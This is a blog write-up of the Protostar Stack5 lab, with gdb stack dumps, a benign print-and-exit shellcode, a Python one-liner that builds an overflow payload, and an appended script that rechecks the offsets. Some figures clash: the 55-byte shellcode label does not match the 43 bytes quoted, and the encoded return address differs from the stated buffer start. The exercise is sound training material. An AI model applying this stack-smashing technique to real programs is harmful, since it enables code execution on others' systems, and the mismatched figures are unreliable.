Saturday, December 20, 2014

Protostar - Stack #5


About:

Stack5 is a standard buffer overflow, this time introducing shellcode.


Source Code:





Solution:

This time, because the level is only an introduction to shellcode, we have to supply both our own objective and the shellcode that achieves it.

I'll use the 55-byte shellcode example from this blog post: http://www.orkspace.net/software/libShellCode/examples/example_1.c
\xeb\x19\x5e\x31\xc0\x31\xdb\x31\xd2\x89\xf1\x80\xc3\x01\xb0\x04\xb2\x0b\xcd\x80\x31\xc0\x31\xdb\x40\xcd\x80\xe8\xe2\xff\xff\xff\x49\x27\x6d\x20\x48\x65\x72\x65\x21\x21\x21
This shellcode writes the text "I'm Here!!!" to stdout and then exits.

To get this code executed, we place the shellcode at the start of the buffer, pad the rest of the distance to the saved return address with filler bytes, and then overwrite the saved return address with the buffer's address so that main's ret lands on the shellcode.


(gdb) break main
Breakpoint 1 at 0x80483cd: file stack5/stack5.c, line 10.

(gdb) break *0x080483d9 (right after the gets call)
Breakpoint 2 at 0x80483d9: file stack5/stack5.c, line 11.

(gdb) run < /tmp/a (a file filled with "a"s)
Starting program: /opt/protostar/bin/stack5 < /tmp/a
Breakpoint 1, main (argc=1, argv=0xbffff874) at stack5/stack5.c:10
10    stack5/stack5.c: No such file or directory.
    in stack5/stack5.c

(gdb) x/20xg $esp
0xbffff770:    0xb7ec6165b7fd7ff4    0xb7eada75bffff788
0xbffff780:    0x0804958cb7fd7ff4    0x080482c4bffff798
0xbffff790:    0x0804958cb7ff1040    0x08048409bffff7c8
0xbffff7a0:    0xb7fd7ff4b7fd8304    0xbffff7c8080483f0
0xbffff7b0:    0xb7ff1040b7ec6365    0xb7fd7ff4080483fb
0xbffff7c0:    0x00000000080483f0    0xb7eadc76bffff848
0xbffff7d0:    0xbffff87400000001    0xb7fe1848bffff87c
0xbffff7e0:    0xffffffffbffff830    0x08048232b7ffeff4
0xbffff7f0:    0xbffff83000000001    0xb7fffab0b7ff0626
0xbffff800:    0xb7fd7ff4b7fe1b28    0x0000000000000000

(gdb) c
Continuing.
Breakpoint 2, main (argc=1, argv=0xbffff874) at stack5/stack5.c:11
11    in stack5/stack5.c

(gdb) x/20xg $esp
0xbffff770:    0xb7ec6165bffff780    0xb7eada75bffff788
0xbffff780:    0x6161616161616161    0x6161616161616161
0xbffff790:    0x6161616161616161    0x6161616161616161
0xbffff7a0:    0xb7fd7ff4b7fd8300    0xbffff7c8080483f0
0xbffff7b0:    0xb7ff1040b7ec6365    0xb7fd7ff4080483fb
0xbffff7c0:    0x00000000080483f0    0xb7eadc76bffff848
0xbffff7d0:    0xbffff87400000001    0xb7fe1848bffff87c
0xbffff7e0:    0xffffffffbffff830    0x08048232b7ffeff4
0xbffff7f0:    0xbffff83000000001    0xb7fffab0b7ff0626
0xbffff800:    0xb7fd7ff4b7fe1b28    0x0000000000000000


This looks right: the run of 0x61 ('a') bytes shows that our buffer starts at 0xbffff780.

We know from the previous levels that there are 76 bytes between the start of the buffer and the slot holding the saved EIP, so the value we want to overwrite it with goes at offset 76.

Using the shellcode above, we need 33 more padding bytes after it so that the return address lands in the right slot:

python -c "print '\xeb\x19\x5e\x31\xc0\x31\xdb\x31\xd2\x89\xf1\x80\xc3\x01\xb0\x04\xb2\x0b\xcd\x80\x31\xc0\x31\xdb\x40\xcd\x80\xe8\xe2\xff\xff\xff\x49\x27\x6d\x20\x48\x65\x72\x65\x21\x21\x21' + 'a'*33 + '\xbf\xff\xf7\x70'[::-1]" > /tmp/sc

Once the buffer is saved in /tmp/sc, we can run stack5 and feed the contents of /tmp/sc to it through stdin.

user@protostar:/opt/protostar/bin$ cat /tmp/sc | /opt/protostar/bin/stack5
I'm Here!!!

That's it!

One thing that I haven't fully figured out is what changes when you call stack5 via a relative path instead of an absolute path.

For example, running the line above works, but running cat /tmp/sc | ./stack5 will give a segfault. This lost me about a half-hour and I'll try to come back to this later if I figure it out.
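The addresses and lengths used above, recomputed from the post's own gdb dump, as an added example that is not part of the original post. It reads the x/20xg output (eight-byte giant words, so on little-endian x86 the low half of each printed value is the 4-byte word at the lower address and the high half is the word at +4), finds where the run of 'a' bytes begins, measures the distance to the slot holding main's libc return address 0xb7eadc76, and checks that distance against the shellcode bytes exactly as quoted above plus the 33 padding bytes. It also decodes the address the one-liner writes, '\xbf\xff\xf7\x70'[::-1], and reports its distance from the buffer start; a payload that hard-codes a stack address is sensitive to shifts of a few bytes, and the length of argv[0] and of the environment is one of the things that moves the stack between invocations. The post's one-liner relies on Python 2 string semantics; this script is Python 3 and works on bytes. GDB_DUMP is an excerpt copied from the second dump above, and the function names are my own.

```python
"""Added example (not from the original post): re-derive the numbers used
in the Stack5 writeup from the post's own gdb output.

gdb's `x/20xg` prints 8-byte giant words. On little-endian x86 the 4-byte
value at the lower address is the LOW half of each printed word, which is
why the buffer pointer 0xbffff780 shows up as the right half of the first
value in the dump.
"""
import re
import struct

# Excerpt of the post's second dump (taken after gets() returned).
GDB_DUMP = """\
0xbffff770:    0xb7ec6165bffff780    0xb7eada75bffff788
0xbffff780:    0x6161616161616161    0x6161616161616161
0xbffff790:    0x6161616161616161    0x6161616161616161
0xbffff7a0:    0xb7fd7ff4b7fd8300    0xbffff7c8080483f0
0xbffff7b0:    0xb7ff1040b7ec6365    0xb7fd7ff4080483fb
0xbffff7c0:    0x00000000080483f0    0xb7eadc76bffff848
"""

# The post's payload pieces, unchanged: the write()+exit() shellcode as
# quoted, 33 bytes of 'a' padding, and the address '\xbf\xff\xf7\x70'[::-1].
SHELLCODE = (b"\xeb\x19\x5e\x31\xc0\x31\xdb\x31\xd2\x89\xf1\x80\xc3\x01"
             b"\xb0\x04\xb2\x0b\xcd\x80\x31\xc0\x31\xdb\x40\xcd\x80"
             b"\xe8\xe2\xff\xff\xff" b"I'm Here!!!")
PADDING = b"a" * 33
RET_BYTES = b"\xbf\xff\xf7\x70"[::-1]
LIBC_RETURN = 0xb7eadc76   # value the dump shows in main's saved-EIP slot


def parse_xg(dump):
    """Map every 4-byte-aligned address in an x/xg dump to its 32-bit word."""
    words = {}
    for line in dump.splitlines():
        m = re.match(r"\s*0x([0-9a-fA-F]+):\s+(.*)$", line)
        if not m:
            continue
        addr = int(m.group(1), 16)
        for token in m.group(2).split():
            giant = int(token, 16)
            words[addr] = giant & 0xFFFFFFFF   # low half lives at the lower address
            words[addr + 4] = giant >> 32      # high half lives at address + 4
            addr += 8
    return words


def fill_start(words, fill=b"a"):
    """Lowest address whose word consists entirely of the fill byte."""
    pattern = struct.unpack("<I", fill * 4)[0]
    return min(a for a, w in words.items() if w == pattern)


def offset_to_word(words, start, value):
    """Byte distance from start to the first slot at or after it holding value."""
    hits = [a for a, w in words.items() if w == value and a >= start]
    return min(hits) - start


def layout_report():
    """Cross-check the post's 76-byte offset and payload layout."""
    words = parse_xg(GDB_DUMP)
    buf = fill_start(words)
    ret_off = offset_to_word(words, buf, LIBC_RETURN)
    encoded = struct.unpack("<I", RET_BYTES)[0]
    return {
        "buffer_start": buf,                         # 0xbffff780
        "saved_eip_offset": ret_off,                 # 76
        "shellcode_len": len(SHELLCODE),             # 43 bytes as quoted
        "reaches_saved_eip": len(SHELLCODE) + len(PADDING) == ret_off,
        "encoded_return": encoded,                   # 0xbffff770
        "encoded_minus_buffer": encoded - buf,       # -16: points below the buffer
    }


if __name__ == "__main__":
    for key, val in layout_report().items():
        shown = f"{val:#x}" if isinstance(val, int) and not isinstance(val, bool) else val
        print(f"{key:22} {shown}")
```

Running the script shows that the shellcode plus padding does reach the saved-EIP slot exactly, and that the address the one-liner encodes is 16 bytes below the start of the 'a' fill, which is worth keeping in mind when the same payload behaves differently between two invocations.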


